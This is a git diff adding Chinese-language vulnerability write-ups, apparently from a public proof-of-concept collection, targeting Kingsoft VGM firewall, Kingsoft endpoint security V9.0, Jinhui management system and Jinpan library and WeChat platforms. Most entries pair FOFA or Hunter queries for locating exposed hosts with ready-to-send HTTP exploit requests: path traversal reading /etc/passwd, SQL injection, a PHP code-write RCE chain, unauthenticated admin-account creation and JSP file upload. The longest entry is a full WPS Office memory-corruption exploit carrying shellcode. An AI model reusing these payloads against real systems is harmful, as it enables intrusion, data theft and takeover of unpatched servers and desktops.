+36b5f6c6f67696e322e706870;","type":"0"}}
+写入php代码
+POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1
+Host: 192.168.24.3:6868
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101
+Firefox/114.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 222
+Origin: http://192.168.24.3:6868
+Connection: close
+Referer: http://192.168.24.3:6868/index.php
+{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-
+76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-
+AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}
+
+最后get请求rce：
+http://192.168.24.3:6868/check_login2.php
+```
diff --git a/金山VGM防毒墙downFile存在任意文件读取漏洞.md b/金山VGM防毒墙downFile存在任意文件读取漏洞.md
new file mode 100644
index 0000000..fc2b56f
--- /dev/null
+++ b/金山VGM防毒墙downFile存在任意文件读取漏洞.md
@@ -0,0 +1,39 @@
+# 金山 VGM防毒墙downFile存在任意文件读取漏洞
+
+# 一、漏洞简介
+金山 VGM防毒墙由金山安全自主研发推出的新一代专业化安全网关产品。采用、多核硬件架构和独特的模块化功能设计理念，金山 VGM防毒墙具有的高性能、高安全、易操作等特性，真正满足用户不断变化的信息安全需求。灵活稳定的架构，金山 VGM防毒墙集成了网络防火墙、状态监测、抗DDoS、防恶意软件、URL过滤、DPI监测等多种安全功能，有效抵御各类病毒和恶意软件对用户网络和业务系统的破坏。金山 VGM防毒墙 downFile.php文件存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器任意文件。
+
+# 二、影响版本
++ 金山 VGM防毒墙
+
+# 三、资产测绘
++ fofa`"金山VGM"`
++ 特征
+
+![1708142637307-ffd94189-f19f-4c4d-b4c2-eb650c58dd82.png](./img/3pBGTr3_-hUT2U1o/1708142637307-ffd94189-f19f-4c4d-b4c2-eb650c58dd82-317814.png)
+
+# 四、漏洞复现
+```java
+GET /downFile.php?filename=../../../../etc/passwd HTTP/1.1
+Host: 
+Cookie: PHPSESSID=74hpcfh7p42bll8eabp1v88eq3
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Referer: https://fofa.info/
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: cross-site
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1708142781340-aa4c634a-95fc-4603-a0ed-f8afbeb0a85c.png](./img/3pBGTr3_-hUT2U1o/1708142781340-aa4c634a-95fc-4603-a0ed-f8afbeb0a85c-047081.png)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rzhl67wobwkxypr0>
\ No newline at end of file
diff --git a/金山WPS-RCE.md b/金山WPS-RCE.md
new file mode 100644
index 0000000..b9d91b5
--- /dev/null
+++ b/金山WPS-RCE.md
@@ -0,0 +1,203 @@
+## 金山WPS RCE
+
+wps影响范围为：WPS Office 2023 个人版 < 11.1.0.15120
+WPS Office 2019 企业版 < 11.8.2.12085
+POC
+在1.html当前路径下启动http server并监听80端口，修改hosts文件（测试写死的） 
+127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn
+
+漏洞触发需让域名规则满足clientweb.docer.wps.cn.{xxxxx}wps.cn cloudwps.cn和wps.cn没有任何关系
+代码块在底下。（需要原pdf加wechat）
+```
+<script>
+if(typeof alert === "undefined"){
+alert = console.log;
+}
+let f64 = new Float64Array(1);
+let u32 = new Uint32Array(f64.buffer);
+function d2u(v) {
+f64[0] = v;
+return u32;
+}
+function u2d(lo, hi) {
+u32[0] = lo;
+u32[1] = hi;
+return f64[0];
+}
+function gc(){ // major
+for (let i = 0; i < 0x10; i++) {
+new Array(0x100000);
+}
+}
+function foo(bug) {
+function C(z) {
+Error.prepareStackTrace = function(t, B) {
+return B[z].getThis();
+};
+let p = Error().stack;
+Error.prepareStackTrace = null;
+return p;
+}
+function J() {}
+var optim = false;
+var opt = new Function(
+'a', 'b', 'c',
+'if(typeof a===\'number\'){if(a>2){for(var
+i=0;i<100;i++);return;}b.d(a,b,1);return}' +
+'g++;'.repeat(70));
+var e = null;
+J.prototype.d = new Function(
+'a', 'b', '"use strict";b.a.call(arguments,b);return arguments[a];');
+J.prototype.a = new Function('a', 'a.b(0,a)');
+J.prototype.b = new Function(
+'a', 'b',
+'b.c();if(a){' +
+'g++;'.repeat(70) + '}');
+J.prototype.c = function() {
+if (optim) {
+var z = C(3);
+var p = C(3);
+z[0] = 0;
+e = {M: z, C: p};
+}
+};
+var a = new J();
+// jit optim
+if (bug) {
+for (var V = 0; 1E4 > V; V++) {
+opt(0 == V % 4 ? 1 : 4, a, 1);
+}
+}
+optim = true;
+opt(1, a, 1);
+return e;
+}
+e1 = foo(false);
+e2 = foo(true);
+delete e2.M[0];
+let hole = e2.C[0];
+let map = new Map();
+map.set('asd', 8);
+map.set(hole, 0x8);
+map.delete(hole);
+map.delete(hole);
+map.delete("asd");
+map.set(0x20, "aaaa");
+let arr3 = new Array(0);
+let arr4 = new Array(0);
+let arr5 = new Array(1);
+let oob_array = [];
+oob_array.push(1.1);
+map.set("1", -1);
+let obj_array = {
+m: 1337, target: gc
+};
+let ab = new ArrayBuffer(1337);
+let object_idx = undefined;
+let object_idx_flag = undefined;
+let max_size = 0x1000;
+for (let i = 0; i < max_size; i++) {
+if (d2u(oob_array[i])[0] === 0xa72) {
+object_idx = i;
+object_idx_flag = 1;
+break;
+}if (d2u(oob_array[i])[1] === 0xa72) {
+object_idx = i + 1;
+object_idx_flag = 0;
+break;
+}
+}
+function addrof(obj_para) {
+obj_array.target = obj_para;
+let addr = d2u(oob_array[object_idx])[object_idx_flag] - 1;
+obj_array.target = gc;
+return addr;
+}
+function fakeobj(addr) {
+let r8 = d2u(oob_array[object_idx]);
+if (object_idx_flag === 0) {
+oob_array[object_idx] = u2d(addr, r8[1]);
+}else {
+oob_array[object_idx] = u2d(r8[0], addr);
+}
+return obj_array.target;
+}
+let bk_idx = undefined;
+let bk_idx_flag = undefined;
+for (let i = 0; i < max_size; i++) {
+if (d2u(oob_array[i])[0] === 1337) {
+bk_idx = i;
+bk_idx_flag = 1;
+break;
+}if (d2u(oob_array[i])[1] === 1337) {
+bk_idx = i + 1;
+bk_idx_flag = 0;
+break;
+}
+}
+let dv = new DataView(ab);
+function get_32(addr) {
+let r8 = d2u(oob_array[bk_idx]);
+if (bk_idx_flag === 0) {
+oob_array[bk_idx] = u2d(addr, r8[1]);
+} else {
+oob_array[bk_idx] = u2d(r8[0], addr);
+}
+let val = dv.getUint32(0, true);
+oob_array[bk_idx] = u2d(r8[0], r8[1]);
+return val;
+}
+function set_32(addr, val) {
+let r8 = d2u(oob_array[bk_idx]);
+if (bk_idx_flag === 0) {
+oob_array[bk_idx] = u2d(addr, r8[1]);
+} else {
+oob_array[bk_idx] = u2d(r8[0], addr);
+}
+dv.setUint32(0, val, true);
+oob_array[bk_idx] = u2d(r8[0], r8[1]);
+}
+function write8(addr, val) {
+let r8 = d2u(oob_array[bk_idx]);
+if (bk_idx_flag === 0) {
+oob_array[bk_idx] = u2d(addr, r8[1]);
+} else {
+oob_array[bk_idx] = u2d(r8[0], addr);
+}
+dv.setUint8(0, val);
+}
+let fake_length = get_32(addrof(oob_array)+12);
+set_32(get_32(addrof(oob_array)+8)+4,fake_length);
+let wasm_code = new
+Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,
+128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,
+128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0
+,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
+let wasm_mod = new WebAssembly.Module(wasm_code);
+let wasm_instance = new WebAssembly.Instance(wasm_mod);
+let f = wasm_instance.exports.main;
+let target_addr = addrof(wasm_instance)+0x40;
+let rwx_mem = get_32(target_addr);
+//alert("rwx_mem is"+rwx_mem.toString(16));
+const shellcode = new Uint8Array([0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,
+0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30,0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14,
+0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,0xac, 0x3c, 0x61, 0x7c,
+0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52,0x57, 0x8b,
+0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01,
+0xd1,0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49,
+0x8b, 0x34, 0x8b,0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7,
+0x38, 0xe0, 0x75, 0xf6, 0x03,0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58,
+0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b,0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01,
+0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24,0x24, 0x5b, 0x5b, 0x61,
+0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb,0x8d, 0x5d,
+0x6a, 0x01, 0x8d, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x50, 0x68, 0x31, 0x8b,
+0x6f,0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd,
+0x9d, 0xff, 0xd5,0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
+0x47, 0x13, 0x72, 0x6f, 0x6a,0x00, 0x53, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63,
+0x00]);
+for(let i=0;i<shellcode.length;i++){
+write8(rwx_mem+i,shellcode[i]);
+}
+f();
+</script>
+```
diff --git a/金山终端安全系统V9.0-SQL注入漏洞.md b/金山终端安全系统V9.0-SQL注入漏洞.md
new file mode 100644
index 0000000..12542fa
--- /dev/null
+++ b/金山终端安全系统V9.0-SQL注入漏洞.md
@@ -0,0 +1,20 @@
+## 金山终端安全系统V9.0 SQL注入漏洞
+
+## fofa查询语法
+```
+app="金山终端安全系统V9.0Web控制台"
+title=="用户登录-金山终端安全系统V9.0Web控制台"
+```
+
+## 影响版本
+金山终端安全系统 V9.0 < V9.SP1.E1008
+
+## POC
+```
+POST /inter/update_software_info_v2.php HTTP/1.1 
+Content-Type: application/x-www-form-urlencoded 
+Host: ip:port
+Content-Length: 81
+
+type=--1E0union/**/se#lect-1E0,2,1,user(),5,6,7,8--&key=123&pageCount=1&curPage=1
+```
diff --git a/金山终端安全系统V9.0SQL注入漏洞.md b/金山终端安全系统V9.0SQL注入漏洞.md
new file mode 100644
index 0000000..3d21a79
--- /dev/null
+++ b/金山终端安全系统V9.0SQL注入漏洞.md
@@ -0,0 +1,34 @@
+# 金山终端安全系统V9.0 SQL注入漏洞
+
+### 一、漏洞描述
+<font style="color:rgb(0, 0, 0);">金山终端安全系统是一款为企业提供终端防护的安全产品，针对恶意软件、病毒和外部攻击提供防范措施，帮助维护企业数据和网络。</font>
+
+### 二、影响版本
+金山终端安全系统V9.0
+
+### 三、资产测绘
+app="金山终端安全系统V9.0Web控制台" 
+
+特征：
+
+![1708655780558-39f26009-21b3-4401-a4dc-5c95b44a6fcd.png](./img/rElhjlKBz286TiEn/1708655780558-39f26009-21b3-4401-a4dc-5c95b44a6fcd-030937.png)
+
+### 四、漏洞复现
+```plain
+POST /inter/update_software_info_v2.php HTTP/1.1
+Content-type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
+Host: 139.xxx.xxx.xxx:6868
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 80
+Connection: close
+
+type=-100+UNION+SELECT+1,md5(078674232),1,1,1,1,1,1--&key=&pageCount=0&curPage=
+```
+
+![1708798065830-b49297cc-2af2-42c5-b632-673baac678c4.png](./img/rElhjlKBz286TiEn/1708798065830-b49297cc-2af2-42c5-b632-673baac678c4-069542.png)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aqzk9xw44zcyzkgt>
\ No newline at end of file
diff --git a/金山终端安全系统V9.0任意用户添加漏洞.md b/金山终端安全系统V9.0任意用户添加漏洞.md
new file mode 100644
index 0000000..55ed87a
--- /dev/null
+++ b/金山终端安全系统V9.0任意用户添加漏洞.md
@@ -0,0 +1,78 @@
+# 金山终端安全系统V9.0任意用户添加漏洞
+
+## fofa
+
+```javascript
+title=="用户登录-猎鹰终端安全系统V9.0Web控制台" 
+app="金山终端安全系统V9.0Web控制台"
+```
+
+## poc
+
+首先访问 checklogin.php，设置$_SESSION[‘userName’]。(后续的 Cookie 保持不变)
+
+```javascript
+POST /inter/ajax.php?imd=checklogin HTTP/1.1
+Host: 192.168.20.131:6868
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Origin: http://192.168.20.131:6868
+Connection: close
+Referer: http://192.168.20.131:6868/
+Cookie: SKYLARa0aede9e785feabae789c6e03d=v70c2hbb4fnf1mqa1l9f44a964
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 20
+
+uname=login_session_
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412301550929.png)
+
+ 接下来访问 send_verify2email.php 在 redis 中添加一个键值对:（mailTo 符合邮箱格式即可）
+
+```javascript
+POST /inter/ajax.php?imd=send_verify2email HTTP/1.1
+Host: 192.168.20.131:6868
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Origin: http://192.168.20.131:6868
+Connection: close
+Referer: http://192.168.20.131:6868/
+Cookie: SKYLARa0aede9e785feabae789c6e03d=v70c2hbb4fnf1mqa1l9f44a964 
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 33
+
+mailTo=login_session_@qq.comEmail
+```
+
+![image-20241230155135464](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412301551573.png)
+
+面两个步骤访问完成之后，即可未授权访问系统的所有功能，接下来通过权限校验，添加一个系统管理员，访问 get_user_login_cmd 文件即可。(userSession 需要设置成 Email，密码为 1qaz@WSX)
+
+```javascript
+POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
+Host: 192.168.20.131:6868
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest
+Content-Length: 285
+Origin: http://192.168.20.131:6868
+Connection: close
+Referer: http://192.168.20.131:6868/
+Cookie: SKYLARa0aede9e785feabae789c6e03d=v70c2hbb4fnf1mqa1l9f44a964
+
+{"add_user_info_cmd":{"userSession":"Email","mode_id":"B666A8CD-2247-2CA8-4F7D-29EB058A27C2","real_name":"","user_name":"hacker","type":"分级管理员","tel":"","mobile":"","corp":"","notice":"","psw":"92d7ddd2a010c59511dc2905b7e14f64","email":"","VHierarchyName":"","orgtype":"1"}}
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412301552673.png)
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412301552975.png)
+
+## 漏洞来源
+
+- https://xz.aliyun.com/t/16105
\ No newline at end of file
diff --git a/金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞.md b/金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞.md
index 7680665..0cd9e79 100644
--- a/金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞.md
+++ b/金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞.md
@@ -1,26 +1,26 @@
 # 金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞
 
-由于金慧-综合管理信息系统 LoginBegin.aspx（登录接口处）没有对外部输入的SQL语句进行严格的校验和过滤，直接带入数据库执行，导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
 
 ## fofa
 
-```yaml
+```kotlin
 body="/Portal/LoginBegin.aspx"
 ```
 
 ## poc
 
-```yaml
-POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1
-Host: 
-Accept-Encoding: gzip, deflate
-Accept: */*
-X-Requested-With: XMLHttpRequest
-Content-Type: application/x-www-form-urlencoded
-Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
- 
+```javascript
+POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1
+Host:127.0.0.1
+User-Agent:Mozilla/4.0(compatible; MSIE 6.0;Windows NT 5.1; SV1;QQDownload732;.NET4.0C;.NET4.0E)
+Content-Length:363
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With:XMLHttpRequest
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+
 Todo=Validate&LoginName=1%27+AND+5094+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%285094%3D5094%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29+AND+%27JKJg%27%3D%27JKJg&Password=&CDomain=Local&FromUrl=
 ```
 
-![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407261053940.png)
\ No newline at end of file
+![9bf0a2e8296781c0d73ecfc9854d1bc0](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410071441284.png)
\ No newline at end of file
diff --git a/金慧综合管理信息系统LoginBegin存在sql注入漏洞.md b/金慧综合管理信息系统LoginBegin存在sql注入漏洞.md
new file mode 100644
index 0000000..bc2607f
--- /dev/null
+++ b/金慧综合管理信息系统LoginBegin存在sql注入漏洞.md
@@ -0,0 +1,34 @@
+# 金慧综合管理信息系统LoginBegin存在sql注入漏洞
+
+# 一、漏洞简介
+金慧综合管理信息系统LoginBegin存在sql注入漏洞
+
+# 二、影响版本
++ 金慧综合管理信息系统
+
+# 三、资产测绘
++ fofa`app="金慧-综合管理信息系统"`
++ 特征
+
+![1721921858962-77717a38-8222-4d54-a644-7eaa5cf8727a.png](./img/s-W9Z5FFLeIkJsE1/1721921858962-77717a38-8222-4d54-a644-7eaa5cf8727a-034732.png)
+
+# 四、漏洞复现
+```plain
+POST /Portal/LoginBegin.aspx HTTP/1.1
+Upgrade-Insecure-Requests: 1
+Connection: close
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Chrome/23.0.1271.64 Safari/537.11
+Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
+Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
+Content-Type: application/x-www-form-urlencoded
+Host: 
+
+Todo=Validate&LoginName=beczou'or (select db_name())>0--&Password=admin&CDomain=Local&FromUrl=admin
+```
+
+![1721921873278-42d20cf4-a157-42ed-9fed-ad044cefe8a1.png](./img/s-W9Z5FFLeIkJsE1/1721921873278-42d20cf4-a157-42ed-9fed-ad044cefe8a1-037486.png)
+
+
+
+> 更新: 2024-08-12 17:15:59  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ccmkokynsqfrhghm>
\ No newline at end of file
diff --git a/金盘图书馆系统doUpload存在任意文件上传漏洞.md b/金盘图书馆系统doUpload存在任意文件上传漏洞.md
new file mode 100644
index 0000000..b879a55
--- /dev/null
+++ b/金盘图书馆系统doUpload存在任意文件上传漏洞.md
@@ -0,0 +1,65 @@
+# 金盘图书馆系统doUpload存在任意文件上传漏洞
+
+# 一、漏洞简介
+金盘图书馆系统doUpload存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 金盘图书馆系统
+
+# 三、资产测绘
++ hunter`web.body="/opac/opacRssCollect"`
++ 特征
+
+![1706076005993-3c01f170-38cf-4fef-a8a9-9f2b8d038e47.png](./img/J_6NyNKSVhklsxlG/1706076005993-3c01f170-38cf-4fef-a8a9-9f2b8d038e47-740576.png)
+
+# 四、漏洞复现
+```plain
+POST /pages/admin/tools/uploadFile/doUpload.jsp HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Content-Length: 235
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+Content-Type: multipart/form-data; boundary=----xbkdgks1fwucvok84tce
+Upgrade-Insecure-Requests: 1
+X-Forwarded-For: 127.0.0.1
+X-Originating-IP: 127.0.0.1
+X-Remote-Addr: 127.0.0.1
+X-Remote-IP: 127.0.0.1
+
+------xbkdgks1fwucvok84tce
+Content-Disposition: form-data; name="file";filename="tvrodinjqx.jsp"
+
+<%out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+------xbkdgks1fwucvok84tce--
+```
+
+![1706076044489-305f3cf0-e373-47b5-b0f9-c72f0570d05f.png](./img/J_6NyNKSVhklsxlG/1706076044489-305f3cf0-e373-47b5-b0f9-c72f0570d05f-592253.png)
+
+上传文件位置
+
+```plain
+GET /upload/2024-01-24/1706077745930.jsp HTTP/1.1
+Host: 42.247.6.28:9090
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+Upgrade-Insecure-Requests: 1
+X-Forwarded-For: 127.0.0.1
+X-Originating-IP: 127.0.0.1
+X-Remote-Addr: 127.0.0.1
+X-Remote-IP: 127.0.0.1
+```
+
+![1706077840008-2a84e501-4e3c-4484-8b55-93a74b9f3b96.png](./img/J_6NyNKSVhklsxlG/1706077840008-2a84e501-4e3c-4484-8b55-93a74b9f3b96-027567.png)
+
+[金盘图书馆系统-doupload-任意文件上传.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222151277-db0f2eb8-6fd5-4fbe-957a-bab7b52f6727.yaml)
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/om1k8iewd86fg4op>
\ No newline at end of file
diff --git a/金盘图书馆系统download存在任意文件下载漏洞.md b/金盘图书馆系统download存在任意文件下载漏洞.md
new file mode 100644
index 0000000..0241585
--- /dev/null
+++ b/金盘图书馆系统download存在任意文件下载漏洞.md
@@ -0,0 +1,45 @@
+# 金盘图书馆系统download存在任意文件下载漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">金盘移动图书馆系统 download.jsp 任意文件下载，攻击者可通过此漏洞获取敏感信息，从而为下一步攻击做准备。</font>
+
+# 二、影响版本
++ 金盘图书馆系统
+
+# 三、资产测绘
++ hunter`web.body="/opac/opacRssCollect"`
++ 特征
+
+![1706076005993-3c01f170-38cf-4fef-a8a9-9f2b8d038e47.png](./img/x_-unzLuHa8IxmEt/1706076005993-3c01f170-38cf-4fef-a8a9-9f2b8d038e47-764235.png)
+
+# 四、漏洞复现
+```plain
+GET /pages/admin/tools/file/download.jsp?items=/WEB-INF/web.xml HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=9464BF4CB3C292D28F4239D97F50B1B6
+Upgrade-Insecure-Requests: 1
+```
+
+![1706076638335-24a129c0-1c51-4a93-8fd4-b39ec8e865e7.png](./img/x_-unzLuHa8IxmEt/1706076638335-24a129c0-1c51-4a93-8fd4-b39ec8e865e7-583200.png)
+
+其他文件位置
+
+```plain
+/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/proxy-config.xml
+/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/services-config.xml
+/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/remoting-config.xml
+/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/messaging-config.xml
+/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/data-management-config.xml
+/pages/admin/tools/file/download.jsp?items=/WEB-INF/classes/lcatalina.properties
+/pages/admin/tools/file/download.jsp?items=/WEB-INF/classes/application.properties
+```
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fbglrzkd6l0zsdg2>
\ No newline at end of file
diff --git a/金盘微信管理平台download.jsp任意文件读取漏洞.md b/金盘微信管理平台download.jsp任意文件读取漏洞.md
new file mode 100644
index 0000000..2f39074
--- /dev/null
+++ b/金盘微信管理平台download.jsp任意文件读取漏洞.md
@@ -0,0 +1,18 @@
+# 金盘微信管理平台download.jsp任意文件读取漏洞
+
+金盘微信管理平台download.jsp任意文件读取漏洞，通过该漏洞读取数据库配置文件等
+
+## fofa
+
+```javascript
+title=="微信管理后台"
+```
+
+## poc
+
+```javascript
+GET /mobile/pages/admin/tools/file/download.jsp?items=/WEB-INF/web.xml HTTP/1.1
+Host: 
+```
+
+![image-20241021172734743](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410211727896.png)
\ No newline at end of file
diff --git a/金盘微信管理平台getsysteminfo接口未授权访问漏洞.md b/金盘微信管理平台getsysteminfo接口未授权访问漏洞.md
new file mode 100644
index 0000000..27f2ab1
--- /dev/null
+++ b/金盘微信管理平台getsysteminfo接口未授权访问漏洞.md
@@ -0,0 +1,38 @@
+# 金盘微信管理平台getsysteminfo接口未授权访问漏洞
+
+# 一、漏洞简介
+金盘 微信管理平台 getsysteminfo接口存在未授权访问漏洞，攻击者通过漏洞可以获取账号密码信息，获取后台管理员权限。
+
+# 二、影响班额本
++ 金盘微信管理平台<3.3.1
+
+# 三、资产测绘
++ hunter`web.title="微信管理后台"&&web.icon=="0488faca4c19046b94d07c3ee83cf9d6"`
++ 登录页面
+
+![1693023434425-63d7794d-540c-4402-93e3-4899a5bbb674.png](./img/xKPjSvbVlNKLE_7U/1693023434425-63d7794d-540c-4402-93e3-4899a5bbb674-617953.png)
+
+# 四、漏洞复现
+通过`poc`获取账号密码
+
+```plain
+GET /admin/weichatcfg/getsysteminfo HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
